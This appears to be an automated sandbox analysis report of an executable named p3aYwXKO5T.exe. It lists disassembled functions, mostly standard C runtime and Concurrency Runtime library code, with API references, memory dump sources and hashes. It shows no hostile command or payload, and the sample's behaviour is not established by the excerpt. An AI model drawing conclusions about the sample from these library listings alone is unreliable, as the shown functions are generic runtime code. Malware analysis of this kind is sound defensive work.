Part of subcall function 00431E11: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,0043188A), ref: 00431E21

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00431B57
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00431B66
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00431C2A

Strings

switchState, xrefs: 00431B5E
pContext, xrefs: 00431C22

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
String ID: pContext$switchState
API String ID: 1312548968-2660820399
Opcode ID: 84332b62cc3de3cfa4170185330e29230a9dc1dcd046b531a1b7116e20220df0
Instruction ID: b863e61c3d732dd5109429b6f29941dee9b5abb7f1e972ae7809c7e47913e2a3
Opcode Fuzzy Hash: 84332b62cc3de3cfa4170185330e29230a9dc1dcd046b531a1b7116e20220df0
Instruction Fuzzy Hash: 8331D835A00204ABCF05EF64C881AAEB775FF4C314F20556BED1197362EB79EE05CA98

Function 0234EA16 Relevance: 10.6, APIs: 7, Instructions: 102COMMON

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0234EA3E

Part of subcall function 0234E7AB: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0234E7DE
Part of subcall function 0234E7AB: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0234E800

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0234EABB
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0234EAC7
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0234EAD6
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0234EAE0
Concurrency::location::_Assign.LIBCMT ref: 0234EB14
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0234EB1C

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
Instruction ID: 5501f17e8f41731dd64c573a6d6eb116a5da416a18e842bd9653f38dd278ae63
Opcode Fuzzy Hash: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
Instruction Fuzzy Hash: 38411C39A002149FCB15EF64C494BADB7F6FF48314F1485A9DD499B381DB70AA41CF91

Function 0042E7AF Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0042E7D7

Part of subcall function 0042E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042E577
Part of subcall function 0042E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042E599

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042E854
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042E860
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0042E86F
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042E879
Concurrency::location::_Assign.LIBCMT ref: 0042E8AD
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E8B5

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
Instruction ID: 01245f0547eb729828e98329900f8f6e173d559f1909e94d2917f6101dcd408e
Opcode Fuzzy Hash: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
Instruction Fuzzy Hash: 19415A39A00214EFCF00EF65D484AADB7B5FF48314F5480AAED499B382DB34A941CB95

Function 0043DFE3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\p3aYwXKO5T.exe, xrefs: 0043DFE8
6C, xrefs: 0043E034

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID: 6C$C:\Users\user\Desktop\p3aYwXKO5T.exe
API String ID: 0-1505539962
Opcode ID: dd2dd9f4d129958e1b06d5edd0e164f71e48155ec8fa6cde618221c2102e1a72
Instruction ID: fd95ef61c06ac132fca33f58cee54c31b72be5874fd36115616c9f4bad4a65b4
Opcode Fuzzy Hash: dd2dd9f4d129958e1b06d5edd0e164f71e48155ec8fa6cde618221c2102e1a72
Instruction Fuzzy Hash: 8521C171605219BFDB34AF669C80E2B77BCEF08368F10551AF52892292E769EC009769

Function 0233F0C6 Relevance: 10.6, APIs: 7, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0233F0CD
_SpinWait.LIBCONCRT ref: 0233F123
Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0233F12F
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0233F148
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0233F176
Concurrency::Context::Block.LIBCONCRT ref: 0233F198

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::H_prolog3ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
String ID:
API String ID: 1888882079-0
Opcode ID: 51f1a6270a472bcdd30247f4592d3322b934ddd74063de143c259ec6416e4012
Instruction ID: 1c82e8749d19a4c6d237febac8f585df2a0f3fd45bdbd94fd88ac2c0567bee53
Opcode Fuzzy Hash: 51f1a6270a472bcdd30247f4592d3322b934ddd74063de143c259ec6416e4012
Instruction Fuzzy Hash: 74218170C002199ADF2AEFA4D8457EEB7F1AF04314F90061AD065A6590EB758745CFD1

Function 0235F342 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0235F30A: _free.LIBCMT ref: 0235F32F

_free.LIBCMT ref: 0235F390

Part of subcall function 0235B05C: HeapFree.KERNEL32(00000000,00000000,?,0235F334,?,00000000,?,?,?,0235F35B,?,00000007,?,?,0235F75D,?), ref: 0235B072
Part of subcall function 0235B05C: GetLastError.KERNEL32(?,?,0235F334,?,00000000,?,?,?,0235F35B,?,00000007,?,?,0235F75D,?,?), ref: 0235B084

_free.LIBCMT ref: 0235F39B
_free.LIBCMT ref: 0235F3A6
_free.LIBCMT ref: 0235F3FA
_free.LIBCMT ref: 0235F405
_free.LIBCMT ref: 0235F410
_free.LIBCMT ref: 0235F41B

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction ID: e2d542cc6e2f1c5e5904b43e0ef137737369d6320d84ff901cc661c205fd08ae
Opcode Fuzzy Hash: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction Fuzzy Hash: 92111272542724E7EA30B770DC45FCBBB9F7F05710F404816AADDA6891D769F5048E90

Function 0043F0DB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043F0A3: _free.LIBCMT ref: 0043F0C8

_free.LIBCMT ref: 0043F129

Part of subcall function 0043ADF5: HeapFree.KERNEL32(00000000,00000000,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?), ref: 0043AE0B
Part of subcall function 0043ADF5: GetLastError.KERNEL32(?,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?,?), ref: 0043AE1D

_free.LIBCMT ref: 0043F134
_free.LIBCMT ref: 0043F13F
_free.LIBCMT ref: 0043F193
_free.LIBCMT ref: 0043F19E
_free.LIBCMT ref: 0043F1A9
_free.LIBCMT ref: 0043F1B4

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction ID: c3a7340a8ef7a1c42761e22c66233c02557cf0a4384e4ec730fa78aa122713dc
Opcode Fuzzy Hash: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction Fuzzy Hash: BC118131940B04AAD930B7B2CC07FCB77EE9F08719F40183EB699A6053DA2EB5594656

Function 0233FCD8 Relevance: 10.6, APIs: 7, Instructions: 60libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(004512B4,?,00000000,00000000,?,?,?,02343E4D), ref: 0233FCE6
GetProcAddress.KERNEL32(00000000,0045177C), ref: 0233FCF4
GetProcAddress.KERNEL32(00000000,00451794), ref: 0233FD02
GetProcAddress.KERNEL32(00000000,004517AC), ref: 0233FD30
GetLastError.KERNEL32(?,?,?,02343E4D), ref: 0233FD4B
GetLastError.KERNEL32(?,?,?,02343E4D), ref: 0233FD57
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0233FD6D

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
String ID:
API String ID: 1654681794-0
Opcode ID: 7fe6c5ece6de4c50eb3fb3b842b885c674e1d20cdf18a0be90147e923e9c19f3
Instruction ID: 958ee21e6fae1687bdbc9b7ca372a86395d6eb686f6fd715623b3df4f373262c
Opcode Fuzzy Hash: 7fe6c5ece6de4c50eb3fb3b842b885c674e1d20cdf18a0be90147e923e9c19f3
Instruction Fuzzy Hash: 7601DB3AA003116B97157BB56CCCFB737ECA904B52B600637F901D21A2EF78D4048B79

Function 02337067 Relevance: 9.3, APIs: 6, Instructions: 336COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 02337138
std::_Rethrow_future_exception.LIBCPMT ref: 02337189
std::_Rethrow_future_exception.LIBCPMT ref: 02337199
__Mtx_unlock.LIBCPMT ref: 0233723C
__Mtx_unlock.LIBCPMT ref: 02337342
__Mtx_unlock.LIBCPMT ref: 0233737D

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
String ID:
API String ID: 1997747980-0
Opcode ID: 411bbcd3c98b8483f8dc7711dd14b2669908e861b9d7381f1d8c4d8a9dcadb8d
Instruction ID: 1ee87eaf0c551187e7e714bda540a26fb53d045ddb68d091b72fe07463920299
Opcode Fuzzy Hash: 411bbcd3c98b8483f8dc7711dd14b2669908e861b9d7381f1d8c4d8a9dcadb8d
Instruction Fuzzy Hash: 5AC1C0B1D002489BDB32DFA4C944BAEFBF5EF05314F00496ED816A7681E775E605CBA1

Function 00416E00 Relevance: 9.3, APIs: 6, Instructions: 336COMMON

Download Yara Rule

APIs

Part of subcall function 0041C6AC: mtx_do_lock.LIBCPMT ref: 0041C6B4

__Mtx_unlock.LIBCPMT ref: 00416ED1
std::_Rethrow_future_exception.LIBCPMT ref: 00416F22
std::_Rethrow_future_exception.LIBCPMT ref: 00416F32
__Mtx_unlock.LIBCPMT ref: 00416FD5
__Mtx_unlock.LIBCPMT ref: 004170DB
__Mtx_unlock.LIBCPMT ref: 00417116

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$mtx_do_lock
String ID:
API String ID: 95294986-0
Opcode ID: 046fbe0f4980c1b9ef584b946209c84bf0753a82647ed566538800b283741cc2
Instruction ID: d5c402bd19617442db253326e825c470d249229bcec99b7fb150ec4f877a8494
Opcode Fuzzy Hash: 046fbe0f4980c1b9ef584b946209c84bf0753a82647ed566538800b283741cc2
Instruction Fuzzy Hash: D2C1E171904304ABDB20DFA5C945BEBBBF4AF04314F00456FE81697782EB79A984CB65

Function 0235FF27 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,02328A07,00000000), ref: 0235FF6F
__fassign.LIBCMT ref: 0236014E
__fassign.LIBCMT ref: 0236016B
WriteFile.KERNEL32(?,02328A07,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 023601B3
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 023601F3
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0236029F

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: aeaffaf03d6c38a690940c40d1bea6644629eb38ec1b3c0d319535d1d52f1a6c
Instruction ID: a40767b27b4655867c24b08e70b72d1b987e23a4f7722e8b79e7b67692436055
Opcode Fuzzy Hash: aeaffaf03d6c38a690940c40d1bea6644629eb38ec1b3c0d319535d1d52f1a6c
Instruction Fuzzy Hash: 4AD19D75D002589FCF19CFE8C884AFDBBB9BF49304F28816AE855B7246D730A946CB50

Function 0043FCC0 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,004087A0,00000000), ref: 0043FD08
__fassign.LIBCMT ref: 0043FEE7
__fassign.LIBCMT ref: 0043FF04
WriteFile.KERNEL32(?,004087A0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0043FF4C
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0043FF8C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00440038

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: d91de68776c85008b4a445cc7eb9458582a7ab784aea8d95e54cc580eb993dda
Instruction ID: b1fa4e01d1e6861320541c535ea6890982759e22aeb82642623fb23c4c1d3398
Opcode Fuzzy Hash: d91de68776c85008b4a445cc7eb9458582a7ab784aea8d95e54cc580eb993dda
Instruction Fuzzy Hash: 2BD19D71D002589FDF15CFA8D980AEDBBB5BF49304F28016AE855FB342E634A946CB58

Function 0234EB44 Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 0234EB85
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0234EB8D
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0234EBB7
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0234EBC0
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0234EC43
Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0234EC4B

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
String ID:
API String ID: 3929269971-0
Opcode ID: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
Instruction ID: 218ae528dd712b4bc9bdc4b9f11bab9f73a19d9f81a7075617f3ac8aebbe17a0
Opcode Fuzzy Hash: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
Instruction Fuzzy Hash: 27410C79A00619ABCB19EF64C894A6DB7F6FF48310F048199E90697791CB74BE01CF81

Function 0042E8DD Relevance: 9.1, APIs: 6, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 0042E91E
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E926
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042E950
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042E959
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042E9DC
Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0042E9E4

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
String ID:
API String ID: 3929269971-0
Opcode ID: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
Instruction ID: e456b2d5945dcb9d16af89579036fa7bc11e47face3e2a4e749ba7397f49833a
Opcode Fuzzy Hash: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
Instruction Fuzzy Hash: A7418079B00219EFCB09DF65D454A6DB7B1FF48310F00816AE806A7391CB38AE41CF85

Function 0041ECE6 Relevance: 9.1, APIs: 6, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0041ECED
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0041ED17

Part of subcall function 0041F3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041F3FA

__alloca_probe_16.LIBCMT ref: 0041ED53
Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0041ED94
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041EDC6
__freea.LIBCMT ref: 0041EDEC

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
String ID:
API String ID: 1319684358-0
Opcode ID: 905480babbdb8262410189c15cedbadfc3d9fa68bc29489cc7bbb29755aa4237
Instruction ID: e5ba4aa972b5b687e82aeba40850cce8f465bb6681a4cf65264b7c2e3798f256
Opcode Fuzzy Hash: 905480babbdb8262410189c15cedbadfc3d9fa68bc29489cc7bbb29755aa4237
Instruction Fuzzy Hash: 3C31A3B5E001068BCB14DFAAD5415EEB7B4EF49314F64406FE805E7351DB389D82C799

Function 0234A28D Relevance: 9.1, APIs: 6, Instructions: 73threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0234A2D0
GetCurrentThread.KERNEL32 ref: 0234A2DA
Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0234A2E6

Part of subcall function 023405EF: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 02340601

Part of subcall function 02340A7B: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 02340A82

Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 0234A329

Part of subcall function 0234B779: SetEvent.KERNEL32(?,?,0234A32E,0234B0C2,00000000,?,00000000,0234B0C2,00000004,0234B76E,?,00000000,?,?,00000000), ref: 0234B7BD

Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0234A332

Part of subcall function 0234ADA8: __EH_prolog3.LIBCMT ref: 0234ADAF
Part of subcall function 0234ADA8: List.LIBCONCRT ref: 0234ADDE

Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0234A342

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$AffinityProxy::SchedulerThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::CountEventFixedH_prolog3ListResourceResource::Subscription
String ID:
API String ID: 701979363-0
Opcode ID: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
Instruction ID: 1ffa98057c3755fe2611d5e60e119ef068f93ab4f05e07370c4ff3c24a10bb28
Opcode Fuzzy Hash: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
Instruction Fuzzy Hash: 0821BD31500B149FCB28EF65D9A08AAF3FAFF48704700499ED84297660DF74F905CB95

Function 0042A026 Relevance: 9.1, APIs: 6, Instructions: 73threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0042A069
GetCurrentThread.KERNEL32 ref: 0042A073
Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0042A07F

Part of subcall function 00420388: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 0042039A

Part of subcall function 00420814: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 0042081B

Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 0042A0C2

Part of subcall function 0042B512: SetEvent.KERNEL32(?,?,0042A0C7,0042AE5B,00000000,?,00000000,0042AE5B,00000004,0042B507,?,00000000,?,?,00000000), ref: 0042B556

Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0042A0CB

Part of subcall function 0042AB41: List.LIBCONCRT ref: 0042AB77

Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0042A0DB

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$AffinityProxy::SchedulerThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::CountEventFixedListResourceResource::Subscription
String ID:
API String ID: 1533441822-0
Opcode ID: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
Instruction ID: 786c6bbc9f4db79065070eee32726b74de41850732c6b9a0a53a64165b4dd308
Opcode Fuzzy Hash: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
Instruction Fuzzy Hash: 5721E031600B249FCB24EF66E9908ABF3F5FF48304740455EE942A7651CB38F805CB9A

Function 0043CBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0043CC66

Strings

vC, xrefs: 0043CBE1

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID: vC
API String ID: 3213747228-1921080006
Opcode ID: 59c984e0335d750eb7e229aa4273084cd5aafbd0618d532e588fc2a2f53891da
Instruction ID: 8cae4ceb00b15cc6f8fe4719d8afecb37dc1afbf88934ae700027118ad1b5c75
Opcode Fuzzy Hash: 59c984e0335d750eb7e229aa4273084cd5aafbd0618d532e588fc2a2f53891da
Instruction Fuzzy Hash: DEB1F3329046459FEB15CF28C8C27AEBBA5EF49344F24916BE855FB341D6389D02CB68

Function 0235519E Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,02355195,02353D59,0233B7BC,00462014,?,00000000,0044B3E8,000000FF,?,02322691,?,?), ref: 023551AC
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 023551BA
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 023551D3
